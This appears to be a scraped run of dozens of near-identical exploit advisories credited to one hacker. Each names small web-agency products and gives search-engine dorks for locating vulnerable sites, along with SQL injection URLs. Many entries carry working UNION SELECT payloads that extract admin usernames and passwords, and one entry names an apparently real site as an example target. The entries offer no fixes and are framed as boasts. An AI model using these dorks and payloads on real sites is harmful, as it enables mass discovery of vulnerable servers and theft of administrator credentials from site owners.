IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## WSTAFF ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.wstaff.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by: WSTAFF srl Exploite: www.victim.com/prodotti.php?codice=-5 union select 1,2,3,user,password from admin www.victim.com/ricetta.php?id=-9/**/union/**/select/**/9,user,9,9,password,9,9/**/from/**/admin # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
MaiNick (ricetta.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## MaiNick (ricetta.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.mainickweb.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Designed by MaiNick inurl:ricetta.php?id= Exploite: www.victim.com/ricetta.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Abarkam (detail.php?input) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Abarkam (detail.php?input) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.abarkam.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : allinurl:detail.php?input= Exploite: www.victim.com/detail.php?input=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
TTW (ricetta.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## TTW (ricetta.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.tamtamsrl.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : credits ttw inurl:ricetta.php?id= Exploite: www.victim.com/ricetta.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
ITTWeb Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## ITTWeb ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.ittweb.net/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Web Design By I.T.T inurl:?id= Exploite: www.victim.com/prodotto.php?id=[SQL] www.victim.com/index.php?command=searchtype=newsid=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Sana Net (viewpages.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Sana Net (viewpages.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.sana-net.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:viewpages.php?id= #1591;#1585;#1575;#1581;#1610; #1608; #1576;#1585;#1606;#1575;#1605;#1607; #1606;#1608;#1740;#1587;#1740; #1575;#1586; #1588;#1585;#1705;#1578; #1591;#1585;#1575;#1581;#1575;#1606; #1587;#1606;#1575; #1606;#1578; Exploite: www.victim.com/viewgal.php?op=-1 union select 1,concat(username,0x3a,password),3,4 from manager # Admin Panel : www.victim.com/adminsite/login-form.php # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Olonet (prodotto.php?idproduct) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Olonet (prodotto.php?idproduct) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.olonet.net/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered designed by Olonet.net Exploite: www.victim.com/prodotto.php?idproduct=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Mediagrafic (prodotto.asp?id) (records.asp?id_p) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Mediagrafic (prodotto.asp?id) (records.asp?id_p) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.mediagrafic.eu/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Mediagrafic.it Exploite: www.victim.com/prodotto.asp?id=-1992 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from config www.victim.com/records.asp?id_p=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
CWM (dettaglio-prodotto.asp?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## CWM (dettaglio-prodotto.asp?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.cynaskyweb.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by CWM inurl:dettaglio-prodotto.asp?id= Exploite: www.victim.com/dettaglio-prodotto.asp?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Sana Net (viewnews.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Sana Net (viewnews.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.sana-net.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:viewnews.php?id= #1591;#1585;#1575;#1581;#1610; #1608; #1576;#1585;#1606;#1575;#1605;#1607; #1606;#1608;#1740;#1587;#1740; #1575;#1586; #1588;#1585;#1705;#1578; #1591;#1585;#1575;#1581;#1575;#1606; #1587;#1606;#1575; #1606;#1578; Exploite: www.victim.com/viewnews.php?id=-null/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null/**/from/**/manager # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
bizConsulting (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## bizConsulting (prodotto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.bizconsulting.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by: bizConsulting inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=-1 union select concat(username,0x3a,password),2 from adm_amministratori # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
webyuss (prodotto.php?id) (quadri.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## webyuss (prodotto.php?id) (quadri.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.webyuss.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by webyuss inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=[SQL] Dork : Powered by webyuss inurl:quadri.php?id= Exploite: www.victim.com/quadri.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Pc Web Agency (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Pc Web Agency (prodotto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.pcwebagency.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Pc Web Agency inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=-Null union select 1,user,pswd,4,5,6,7,8,9,10,11,12,13,14,15,16 from login # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
phpWebSite (publisher) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## phpWebSite (publisher) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : allinurl:mod.php?mod=publisher Exploite: www.victim.com/mod.php?mod=publisherop=allmediaartid=-1 union select concat(aid,0x3a,pwd) from authors Exploite 2 : www.victim.com/mod.php?mod=publisherop=allmediaartid=-1 union select concat(aid,0x3a,pwd) from authors # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Fabio Rispoli (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Fabio Rispoli (prodotto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Fabio Rispoli Exploite: www.victim.com/prodotto.php?id=6+union+select 1,username,password,4,5,Null+from+utenti-- # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Marketing Development (prodotto.php?cat) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Marketing Development (prodotto.php?cat) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.marketingdev.com ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : powered by Marketing Development inurl:prodotto.php?cat= Exploite: www.victim.com/prodotto.php?cat=[SQl] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Datriks Solutions (prodotto.php?id) (dettaglio_socio.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Datriks Solutions (prodotto.php?id) (dettaglio_socio.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.datriks.net/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Datriks Solutions inurl:prodotto.php?id= Exploite: www.victim.com/new/prodotto.php?id=[SQl] Dork : Powered by Datriks Solutions inurl:dettaglio_socio.php?id= Exploite: www.victim.com/dettaglio_socio.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Multimedia Creative (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Multimedia Creative (prodotto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.multimediacreative.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Multimedia Creative inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=[SQl] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
B-Keen communication (dettaglio_news.phpid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## B-Keen communication (dettaglio_news.phpid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.b-keen.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by B-Keen communication inurl:dettaglio_news.php Exploite: www.victim.com/index.php?pagina=dettaglio_news.phpid=[SQL] Example : http://www.victim.com/index.php?pagina=dettaglio_news.phpid=0 union select null,null,@@version,database(),null,null,null,null,null-- # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
BUZLAB (prodotti.php?idCategoria) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## BUZLAB (prodotti.php?idCategoria) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.buzlab.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Produced by BUZLAB inurl:prodotti.php?idCategoria= Exploite: www.victim.com/prodotti.php?idCategoria=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Foresta Creativa (prodotti.php?idCategoria) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Foresta Creativa (prodotti.php?idCategoria) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.forestacreativa.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Foresta Creativa inurl:prodotti.php?idCategoria= Exploite: www.victim.com/prodotti.php?idCategoria=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Web Progetto (prodotti.php?idcategoria) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Web Progetto (prodotti.php?idcategoria) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.webprogetto.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : by Web Progetto inurl:prodotti.php?idcategoria= Exploite: www.victim.com/prodotti.php?idcategoria=-9+union+select+1,user,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from auth_user-- # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Marinet Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Marinet ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.marinet.gr/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Marinet inurl:products.php?categoryid= Exploite : www.victim.com/products.php?categoryid=[SQL] Example : http://www.bestsecurity.gr/products.php?categoryid=1' Dork : Powered by Marinet inurl:location.php?id= Exploite: www.victim.com/location.php?id=[SQL] Dork : Powered by Marinet inurl:info-more.php?id= Exploite: www.victim.com/info-more.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Marinet Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Marinet ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.marinet.gr/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Marinet inurl:products.php?categoryid= Exploite : www.victim.com/products.php?categoryid=[SQL] Dork : Powered by Marinet inurl:location.php?id= Exploite: www.victim.com/location.php?id=[SQL] Dork : Powered by Marinet inurl:info-more.php?id= Exploite: www.victim.com/info-more.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Web Art Studio (prodotto.php?lang) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Web Art Studio (prodotto.php?lang) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.was.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Web Art Studio Web Agency inurl:prodotto.php?lang= Exploite: www.victim.com/prodotto.php?lang=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Listendifferent (prodotto.php?IDprodotto) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Listendifferent (prodotto.php?IDprodotto) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.listendifferent.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Concept and Designed by Listendifferent.com Exploite: www.victim.com/fra/prodotto.php?IDprodotto=-9 union select 1,version(),user(),6,5,6,7,8,9,10 # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
ValtNet (photogallery.html?id_categoria) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## ValtNet (photogallery.html?id_categoria) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.valtnet.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : allinurl:photogallery.html?id_categoria= Exploite: www.victim.com/photogallery.html?id_categoria=-0 union select 1,2,concat(username,0x3a,password),4,5,6 from v_utente Or : www.victim.com/photogallery.html?id_categoria=-0 union select 1,2,concat(username,0x3a,password),4,5 from v_utente # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
CreatiWeb Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## CreatiWeb ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.crweb.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by CreatiWeb inurl:dettaglio_news.php?id= Exploite: www.victim.com/dettaglio_news.php?id=[SQL] Dork : Powered by CreatiWeb inurl:photo.php?album= Exploite : www.victim.com/photo.php?album=[SQL] Dork : Powered by CreatiWeb inurl:gallery.asp?id= Exploite : www.victim.com/gallery.asp?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Alfazeta (list-prodotti.php?idcategoria) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Alfazeta (list-prodotti.php?idcategoria) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.alfazeta.net/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:list-prodotti.php?idcategoria= Exploite: www.victim.com/list-prodotti.php?idcategoria=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Warah Agencia (productos.php?categoria_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Warah Agencia (productos.php?categoria_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.warah.com.ar/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : DESIGN BY WARAH AGENCIA CREATIVA Exploite: www.victim.com/productos.php?categoria_id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Simply Media Web (archivio.asp?categoria_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Simply Media Web (archivio.asp?categoria_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.simplymediaweb.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Simply Media Web inurl:archivio.asp?categoria_id= Exploite: www.victim.com/archivio.asp?categoria_id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Dataminas (noticias.php?categoria_id) (galeria.php?galeria_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Dataminas (noticias.php?categoria_id) (galeria.php?galeria_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.dataminas.com.br/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by DATAMINAS.COM.BR Exploite: www.victim.com/noticias.php?categoria_id=[SQL] www.victim.com/galeria.php?galeria_id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Nafis Group (review.php?ID) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Nafis Group (review.php?ID) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by : Nafis Group Exploite: www.victim.com/review.php?ID=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Nativedreams (Fabarth_gallery.php?categoria_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Nativedreams (Fabarth_gallery.php?categoria_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.nativedreams.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:Fabarth_gallery.php?categoria_id= Exploite: www.victim.com/Fabarth_gallery.php?categoria_id=1+union+select+1,2,version(),4,5,6 # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Data Center Foz (product_cat.php?CATEGORIA_ID) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Data Center Foz (product_cat.php?CATEGORIA_ID) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by DataCenterFoz Exploite: www.victim.com/product_cat.php?CATEGORIA_ID=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
LAB GRAPHIC DESIGN (index.php?categoria_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## LAB GRAPHIC DESIGN (index.php?categoria_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by LAB GRAPHIC DESIGN Exploite: www.victim.com/index.php?categoria_id=Null Union Select @@version # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
ALTOGRADO (catalogo.php?id_categoria) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## ALTOGRADO (catalogo.php?id_categoria) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.altogrado.com.ar/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by ALTOGRADO inurl:catalogo.php?id_categoria= Exploite: www.victim.com/catalogo.php?id_categoria=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Grupo Argentina Web Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Grupo Argentina Web ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://grupoargentinaweb.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Designed powered by GAW GrupoArgentinaWeb inurl:gal_productos.php?idioma Exploite: www.victim.com/gal_productos.php?idioma=Ehsan_Hp200id_categoria=[SQL] Dork : Designed powered by GAW GrupoArgentinaWeb inurl:servicios_detalle.php?seid= Exploite: www.victim.com/servicios_detalle.php?seid=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
dedacom (dettaglio.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## dedacom (dettaglio.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.dedacom.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : powered by dedacom inurl:dettaglio.php?id= Exploite: www.victim.com/dettaglio.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
dpconsulenze (dettaglio.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## dpconsulenze (dettaglio.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.dpconsulenze.eu/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : powered by dpconsulenze inurl:dettaglio.php?id= Exploite: www.victim.com/sito/dettaglio.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
ECHO Creative Company (dettaglio.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## ECHO Creative Company (dettaglio.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.echocreative.it/index.htm ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by ECHO Creative Company inurl:dettaglio.php?id= Exploite: www.victim.com/maglie/dettaglio.php?id=-1 union select 1,concat(version(),0x3a,user(),database()),3,4,5,6,7,8 # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Muzedon (dettaglio.php?id) Remote SQL injection Vulnerability
